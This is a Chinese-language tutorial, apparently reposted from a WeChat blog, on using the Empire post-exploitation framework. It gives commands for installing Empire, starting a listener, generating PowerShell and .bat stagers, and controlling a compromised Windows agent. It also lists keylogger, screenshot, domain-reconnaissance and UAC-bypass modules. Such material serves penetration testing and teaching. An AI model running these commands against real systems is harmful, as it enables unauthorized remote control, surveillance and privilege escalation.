地址:http://github.com/EmpireProject/Empire
虽然说针对win平台的,却只能安装在linux系统上
git clone https://github.com/EmpireProject/Empire.git
sudo ./Empire/setup/install.sh
sudo ./setup/reset.sh
sudo ./Empire/empire
docker pull empireproject/empire
docker run -it -p 7000:7000 --name empire empireproject/empire /bin/bash
sudo ./setup/reset.sh
sudo ./empire
#pip install pefile初始运行可能缺少这个包
(Empire) > listeners
(Empire) > uselistenner (tab)
(Empire) > uselistener http #使用http监听
(Empire: listeners/http) >set Name test #重命名为test
(Empire: listeners/http) >set Host http://192.168.1.1:7000
(Empire: listeners/http) >set Port 7000
(Empire: listeners/http) >execute #开始监听
(Empire) > list listeners
主机上线
(Empire: listeners) > launcher powershell [监听器Name]
(Empire: listeners) > launcher powershell test
(Empire) > usestager windows/launcher_bat [监听器Name] #生成bat文件
(Empire) > usestager windows/launcher_bat test
(Empire: stager/windows/launcher_bat) > info#显示配置项,相当于msf的show options
(Empire: stager/windows/launcher_bat) > set #设置配置项,相当于msf的set
(Empire: stager/windows/launcher_bat) > execute #运行
(Empire: agents) > rename HP79YL2R Win7
(Empire: agents) > interact Win7
(Empire: Win7) > info
(Empire: Win7) > sleep 1
(Empire: Win7) > getuid
(Empire: Win7) > usemodule (tab)
(Empire: Win7) > usemodule collection/screenshot
(Empire: powershell/collection/screenshot) > info
(Empire: powershell/collection/screenshot) > execute
jobs
jobs kill [job_name] #停止任务
(Empire: Win7) > usemodule privesc/bypassuac
(Empire: powershell/privesc/bypassuac) > info
(Empire: powershell/privesc/bypassuac) > set Listenner test
(Empire: powershell/privesc/bypassuac) > execute -y
collection/screenshot#截屏
collection/keylogger#键盘记录
collection/clipboard_monitor#剪贴板记录
situational_awareness/network/powerview/share_finder#域内所有的共享
situational_awareness/host/computerdetails#列举系统中所有有用的信息
situational_awareness/network/arpscan #设置range扫描的网段
situational_awareness/network/reverse_dns#DNS信息获取
situational_awareness/network/powerview/user_hunter#查找域管登陆的机器
situation_awareness/network/powerview/find_localadmin_access#本地管理组访问模块
privesc/bypassuac #Bypass UAC
privesc/pypassuac_wscript#绕过UAC实现管理员权限执行payload。
本文始发于微信公众号(XG小刚):后渗透-Empire简单使用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论